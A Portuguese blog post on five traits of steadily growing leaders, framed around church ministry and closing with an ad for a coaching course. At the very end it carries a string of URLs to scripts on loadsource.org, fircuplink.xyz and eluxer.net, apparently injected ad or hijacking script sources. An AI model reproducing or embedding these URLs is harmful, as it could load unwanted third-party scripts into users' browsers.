5 Características de líderes que crescem constantemente

Todo líder deseja viver o crescimento. No entanto, existem aqueles que não crescem, outros que até começam a crescer, mas por não conseguirem continuar a viver o crescimento, param e existem os que crescem continuamente.

A primeira coisa que precisa ser esclarecida é que, o quanto ou a velocidade que se tem crescido, não é importante. O que acontece muito é que alguns líderes, por se preocuparem demais com a velocidade e com o quanto que estão crescendo, começam a forçar o crescimento até que chegam ao limite e param.

O ideal, seja em que área for, é que o crescimento seja constante. Então, ainda que a velocidade não seja a desejada, o que realmente importa é continuar crescendo.

Líderes que conseguem ter a habilidade de crescer com certa constância apresentam características específicas, dentre elas:

1 – Têm coragem

O líder vai precisar ter coragem de assumir riscos, por exemplo. O líder corajoso traz a responsabilidade para si e tem atitude diante das situações.

O líder corajoso enfrenta desafios, assume a responsabilidade da liderança, lança projetos e vai à frente colocando em prática dizendo o quê e como fazer, ele não deixa para amanhã o que pode ser feito hoje.

Líderes corajosos manifestam coragem e iniciam os projetos com ousadia, produzindo crescimento. A coragem é algo que faz o líder crescer.

2 – Têm a habilidade de se comunicar

Não tem como alcançar o crescimento sem que saiba trabalhar com pessoas. E, para que esse crescimento seja constante, ou seja, se mantenha, a habilidade de se comunicar é indispensável.

Quando o líder tem a habilidade de se comunicar, ele consegue falar com as pessoas de um modo que não atinge só a mente, antes, ele alcança o coração das pessoas com as quais ele trabalha. Ele alcança a razão e a emoção das pessoas a sua volta, fazendo com que, juntos, possam somar nos projetos e alcançar as metas.

É muito importante que as pessoas que se lidera entendam o projeto de forma racional. Porém,mais importante ainda é que as pessoas sintam a emoção de cada projeto, dos desafios que estão envolvidos em cada fase e etc. Quando o líder consegue comunicar isso às pessoas com as quais ele trabalha, ele consegue uma equipe que irá trabalhar em prol de resultados poderosos em unidade.

3 – Têm a capacidade de superação

Superação é a capacidade de reação diante de uma adversidade. É quando o líder precisa mostrar sua liderança quando as coisas não estão dando tão certo quanto deveriam, quanto se imaginava.

Quando o líder tem essa capacidade como característica, ele consegue superar as dificuldades e leva a equipe a viver o crescimento constante, pois a sua capacidade de superação o faz pensar em meios diferentes para a realização dos projetos em questão.

4 – Têm a capacidade de celebrar, sempre

Saber celebrar por cada conquista, por cada vitória, por menor que seja, desperta a criatividade.

Analisando o texto de Gênesis 1, do versículo 10 ao 12, for analisado, pode-se entender que Deus estava trabalhando na criação de todas as coisas, em dado momento, Ele viu que o que havia criado e achou “bom”, então, Ele continuou a criar.

Assim como a superação, a celebração também desperta a criatividade em qualquer liderança. Um líder que celebra suas vitórias e conquistas, seja a família, no trabalho, no ministério ou em qualquer tipo de liderança, ele cria um vínculo muito forte com sua “equipe” e desperta novas ideias para os próximos projetos, o que faz com o que o crescimento se mantenha constante.

5 – Têm paixão pelo crescimento

Líderes que são apaixonados pelo que fazem, também são apaixonados pelo crescimento. Afinal, o crescimento constante é o resultado natural de todo o seu empenho. É a certeza que aquilo que ele está fazendo, está dando certo.

Líderes apaixonados, diariamente, colocam “vida” na liderança de projetos. A paixão é capaz de conduzir qualquer um a lugares e a atitudes inimagináveis para que se alcance o que se deseja.

Por isso, ser apaixonado pelo crescimento é uma característica muito importante na vida de um líder para que ele possa viver o crescimento constante. Pois, quando uma pessoa está apaixonada, ela faz algumas loucuras que uma pessoa que não está apaixonada jamais faria. Ela coloca a sua vida e a sua força no projeto até que ele se concretize com sucesso.

É a paixão que pode fazer com que o líder que está enfrentando muitas dificuldades em sua liderança seja capaz de continuar e de ter atitudes proativas diante de toda e qualquer situação. Por quê? Porque ele está apaixonado pela ideia de ver o crescimento acontecer e tem certeza de que vai dar certo. Então, ele vai até o fim para que isso aconteça e ele continue sonhando com um crescimento ainda maior.

Uma das coisas que tem ajudado muitos líderes a viver esse crescimento são cursos específicos que trazem novas perspectivas de como colocar velhas ideias em prática de maneiras diferentes de forma que se conquiste o que se deseja.

Duas vezes ao ano, o Instituto Liderança de Sucesso promove o Coaching Ministerial. Um curso inovador, específico para líderes de ministérios que querem viver um crescimento constante. Um curso revolucionário que têm trazido resultados reais em muitos ministérios.

Se você quiser mais informações, clique AQUI ou entre em contato com a equipe através do WhatsApp 21-97016-2326. A equipe está pronta, não só para esclarecer toda e qualquer dúvida, como também, para facilitar a sua inscrição, se assim você desejar. Faça o contato e supreenda-se!

 

http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x7038x&r=1532701234679http://fircuplink.xyz/addons/lnkr5.min.jshttp://fircuplink.xyz/addons/lnkr30_nt.min.jshttp://eluxer.net/code?id=105&subid=51824_7038_